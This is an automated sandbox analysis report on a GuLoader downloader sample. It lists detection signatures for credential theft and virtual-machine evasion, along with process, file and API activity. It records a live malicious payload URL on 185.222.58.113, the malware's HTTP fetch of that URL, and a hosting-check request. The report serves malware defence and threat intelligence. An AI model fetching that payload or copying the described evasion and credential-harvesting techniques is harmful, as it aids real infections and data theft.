Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1ppvR5VRT6.exe

Overview

General Information

Sample name:1ppvR5VRT6.exe
Analysis ID:1466840
MD5:12b29055a6b47a95b2fe8bcd19859c70
SHA1:8279ee3c9d9b8fa8f91e6dac00bb1e70cee42793
SHA256:8e90738e8d2c488ac315737c15f39a977d989200cdb20b42a63a1f7bc8438a1e
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Check if machine is in data center or colocation facility
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • 1ppvR5VRT6.exe (PID: 4524 cmdline: "C:\Users\user\Desktop\1ppvR5VRT6.exe" MD5: 12B29055A6B47A95B2FE8BCD19859C70)
    • 1ppvR5VRT6.exe (PID: 9536 cmdline: "C:\Users\user\Desktop\1ppvR5VRT6.exe" MD5: 12B29055A6B47A95B2FE8BCD19859C70)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.101765393244.0000000036D85000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000005.00000002.96966764637.0000000006451000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: 1ppvR5VRT6.exe PID: 4524JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\1ppvR5VRT6.exe, ProcessId: 4524, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing\keelhauls.scr
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\1ppvR5VRT6.exe, ProcessId: 4524, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing\keelhauls.scr
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://185.222.58.113/qUSTn118.binAvira URL Cloud: Label: malware
        Source: 1ppvR5VRT6.exeReversingLabs: Detection: 50%
        Source: 1ppvR5VRT6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 1ppvR5VRT6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_00405861
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_0040639C FindFirstFileA,FindClose,5_2_0040639C
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_004026F8 FindFirstFileA,5_2_004026F8
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_00405861 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,9_2_00405861
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_004026F8 FindFirstFileA,9_2_004026F8
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_0040639C FindFirstFileA,FindClose,9_2_0040639C
        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
        Source: Joe Sandbox ViewIP Address: 185.222.58.113 185.222.58.113
        Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
        Source: unknownDNS query: name: ip-api.com
        Source: global trafficHTTP traffic detected: GET /qUSTn118.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.222.58.113Cache-Control: no-cache
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.113
        Source: global trafficHTTP traffic detected: GET /qUSTn118.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 185.222.58.113Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: ip-api.com
        Source: 1ppvR5VRT6.exe, 00000009.00000003.98820623011.0000000006623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.113/
        Source: 1ppvR5VRT6.exe, 00000009.00000003.98820623011.0000000006623000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.113/qUSTn118.bin
        Source: 1ppvR5VRT6.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: 1ppvR5VRT6.exe, 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 1ppvR5VRT6.exe, 00000005.00000000.96643618239.000000000040A000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_004052FE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_004052FE
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040330D
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_0040330D
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile created: C:\Windows\resources\0409Jump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_004067255_2_00406725
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_00404B3D5_2_00404B3D
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_004067259_2_00406725
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_00404B3D9_2_00404B3D
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_001688F89_2_001688F8
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_001638F89_2_001638F8
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_001649109_2_00164910
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_0016BB689_2_0016BB68
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_0016EF709_2_0016EF70
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_001640409_2_00164040
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_390E21209_2_390E2120
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_390E38C89_2_390E38C8
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_390E80F89_2_390E80F8
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_390EA3109_2_390EA310
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_390E31E09_2_390E31E0
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_001689B09_2_001689B0
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_0016BF109_2_0016BF10
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: String function: 00402AC1 appears 48 times
        Source: 1ppvR5VRT6.exe, 00000005.00000000.96643658007.0000000000441000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamestrabismical.exe0 vs 1ppvR5VRT6.exe
        Source: 1ppvR5VRT6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/12@1/2
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040330D
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,9_2_0040330D
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_004045CA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,5_2_004045CA
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_004020CB CoCreateInstance,MultiByteToWideChar,5_2_004020CB
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenesJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeMutant created: NULL
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile created: C:\Users\user\AppData\Local\Temp\nsbA1CB.tmpJump to behavior
        Source: 1ppvR5VRT6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 1ppvR5VRT6.exeReversingLabs: Detection: 50%
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile read: C:\Users\user\Desktop\1ppvR5VRT6.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\1ppvR5VRT6.exe "C:\Users\user\Desktop\1ppvR5VRT6.exe"
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess created: C:\Users\user\Desktop\1ppvR5VRT6.exe "C:\Users\user\Desktop\1ppvR5VRT6.exe"
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess created: C:\Users\user\Desktop\1ppvR5VRT6.exe "C:\Users\user\Desktop\1ppvR5VRT6.exe"Jump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
        Source: 1ppvR5VRT6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

        Data Obfuscation

        barindex
        Source: Yara matchFile source: Process Memory Space: 1ppvR5VRT6.exe PID: 4524, type: MEMORYSTR
        Source: Yara matchFile source: 00000005.00000002.96966764637.0000000006451000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,5_2_10001A5D
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 5_2_10002D20 push eax; ret 5_2_10002D4E
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_390E15B0 pushfd ; retf 0017h9_2_390E15B1
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeCode function: 9_2_390E1460 push esp; retf 0017h9_2_390E1531
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeFile created: C:\Users\user\AppData\Local\Temp\nskABB0.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\1ppvR5VRT6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
